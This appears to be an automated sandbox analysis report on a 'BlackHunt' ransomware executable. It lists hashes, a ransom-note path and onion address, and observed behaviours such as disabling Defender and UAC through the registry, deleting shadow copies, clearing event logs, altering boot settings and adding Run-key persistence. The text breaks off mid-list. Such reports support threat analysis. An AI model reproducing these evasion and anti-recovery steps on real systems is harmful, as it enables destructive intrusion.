Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:52
Static task
static1
Behavioral task
behavioral1
Sample
7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe
Resource
win10v2004-20231215-en
General
-
Target
7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe
-
Size
707KB
-
MD5
61a092fdf02265b7c91b9617d6ddbea9
-
SHA1
6c0d3390f4e0a90d9ca2acc7c88ae9fdd3344c65
-
SHA256
7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b
-
SHA512
7de8d955bf29f8dbdb7c0eb4a23f16734e64a35926a9c2316ec630c23285617b04f32ff816f5ae5ea26918c1a88b6c4f5898cf74fd5861344a37ce01356b4768
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z82vnh:6uaTmkZJ+naie5OTamgEoKxLW6Ih
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2552 fsutil.exe 2752 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2968 wevtutil.exe 3500 wevtutil.exe 1988 wevtutil.exe 1172 wevtutil.exe 2892 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2084 bcdedit.exe 2880 bcdedit.exe 3464 bcdedit.exe 3408 bcdedit.exe -
Renames multiple (2904) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2736 wbadmin.exe 3608 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 856 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\A: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\B: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\J: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\P: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\N: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\W: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\G: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\K: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\Z: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\L: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\X: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\M: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\R: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\U: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\O: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\Y: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\S: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\V: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\I: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened (read-only) \??\H: 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\#BlackHunt_ReadMe.hta 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\#BlackHunt_ReadMe.txt 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.txt 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hovd 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Adak 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core.xml 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\Java\jre7\lib\security\#BlackHunt_ReadMe.hta 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\or\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\plugins\packetizer\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationLeft_SelectionSubpicture.png 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_ReadMe.hta 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansDemiBold.ttf 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\WaitStep.MOD 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files (x86)\Google\Update\#BlackHunt_ReadMe.txt 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\#BlackHunt_Private.key 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_ja_4.4.0.v20140623020002.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_ReadMe.hta 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#BlackHunt_ReadMe.txt 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2672 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1616 vssadmin.exe 3020 vssadmin.exe 2276 vssadmin.exe 1572 vssadmin.exe 1044 vssadmin.exe 1236 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3108 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3180 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3616 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeRestorePrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeBackupPrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeTakeOwnershipPrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeAuditPrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeSecurityPrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeIncBasePriorityPrivilege 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Token: SeBackupPrivilege 1292 vssvc.exe Token: SeRestorePrivilege 1292 vssvc.exe Token: SeAuditPrivilege 1292 vssvc.exe Token: SeBackupPrivilege 2008 wbengine.exe Token: SeRestorePrivilege 2008 wbengine.exe Token: SeSecurityPrivilege 2008 wbengine.exe Token: SeSecurityPrivilege 1988 wevtutil.exe Token: SeSecurityPrivilege 2968 wevtutil.exe Token: SeBackupPrivilege 2968 wevtutil.exe Token: SeBackupPrivilege 1988 wevtutil.exe Token: SeSecurityPrivilege 3500 wevtutil.exe Token: SeBackupPrivilege 3500 wevtutil.exe Token: SeSecurityPrivilege 2892 wevtutil.exe Token: SeBackupPrivilege 2892 wevtutil.exe Token: SeSecurityPrivilege 1172 wevtutil.exe Token: SeBackupPrivilege 1172 wevtutil.exe Token: SeDebugPrivilege 3108 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1656 wrote to memory of 2668 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 30 PID 1656 wrote to memory of 2668 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 30 PID 1656 wrote to memory of 2668 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 30 PID 1656 wrote to memory of 2668 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 30 PID 1656 wrote to memory of 1784 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 31 PID 1656 wrote to memory of 1784 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 31 PID 1656 wrote to memory of 1784 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 31 PID 1656 wrote to memory of 1784 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 31 PID 1656 wrote to memory of 2720 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 152 PID 1656 wrote to memory of 2720 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 152 PID 1656 wrote to memory of 2720 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 152 PID 1656 wrote to memory of 2720 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 152 PID 2668 wrote to memory of 2744 2668 cmd.exe 149 PID 2668 wrote to memory of 2744 2668 cmd.exe 149 PID 2668 wrote to memory of 2744 2668 cmd.exe 149 PID 1656 wrote to memory of 2748 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 148 PID 1656 wrote to memory of 2748 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 148 PID 1656 wrote to memory of 2748 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 148 PID 1656 wrote to memory of 2748 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 148 PID 1656 wrote to memory of 2684 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 146 PID 1656 wrote to memory of 2684 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 146 PID 1656 wrote to memory of 2684 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 146 PID 1656 wrote to memory of 2684 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 146 PID 1784 wrote to memory of 2660 1784 cmd.exe 32 PID 1784 wrote to memory of 2660 1784 cmd.exe 32 PID 1784 wrote to memory of 2660 1784 cmd.exe 32 PID 1656 wrote to memory of 2892 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 144 PID 1656 wrote to memory of 2892 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 144 PID 1656 wrote to memory of 2892 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 144 PID 1656 wrote to memory of 2892 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 144 PID 1656 wrote to memory of 2644 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 143 PID 1656 wrote to memory of 2644 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 143 PID 1656 wrote to memory of 2644 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 143 PID 1656 wrote to memory of 2644 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 143 PID 1656 wrote to memory of 2764 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 155 PID 1656 wrote to memory of 2764 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 155 PID 1656 wrote to memory of 2764 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 155 PID 1656 wrote to memory of 2764 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 155 PID 2720 wrote to memory of 2548 2720 cmd.exe 138 PID 2720 wrote to memory of 2548 2720 cmd.exe 138 PID 2720 wrote to memory of 2548 2720 cmd.exe 138 PID 1656 wrote to memory of 2104 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 135 PID 1656 wrote to memory of 2104 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 135 PID 1656 wrote to memory of 2104 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 135 PID 1656 wrote to memory of 2104 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 135 PID 1656 wrote to memory of 2692 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 133 PID 1656 wrote to memory of 2692 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 133 PID 1656 wrote to memory of 2692 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 133 PID 1656 wrote to memory of 2692 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 133 PID 1656 wrote to memory of 2524 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 131 PID 1656 wrote to memory of 2524 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 131 PID 1656 wrote to memory of 2524 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 131 PID 1656 wrote to memory of 2524 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 131 PID 1656 wrote to memory of 2556 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 33 PID 1656 wrote to memory of 2556 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 33 PID 1656 wrote to memory of 2556 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 33 PID 1656 wrote to memory of 2556 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 33 PID 1656 wrote to memory of 2972 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 126 PID 1656 wrote to memory of 2972 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 126 PID 1656 wrote to memory of 2972 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 126 PID 1656 wrote to memory of 2972 1656 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe 126 PID 2748 wrote to memory of 2572 2748 cmd.exe 124 PID 2748 wrote to memory of 2572 2748 cmd.exe 124 PID 2748 wrote to memory of 2572 2748 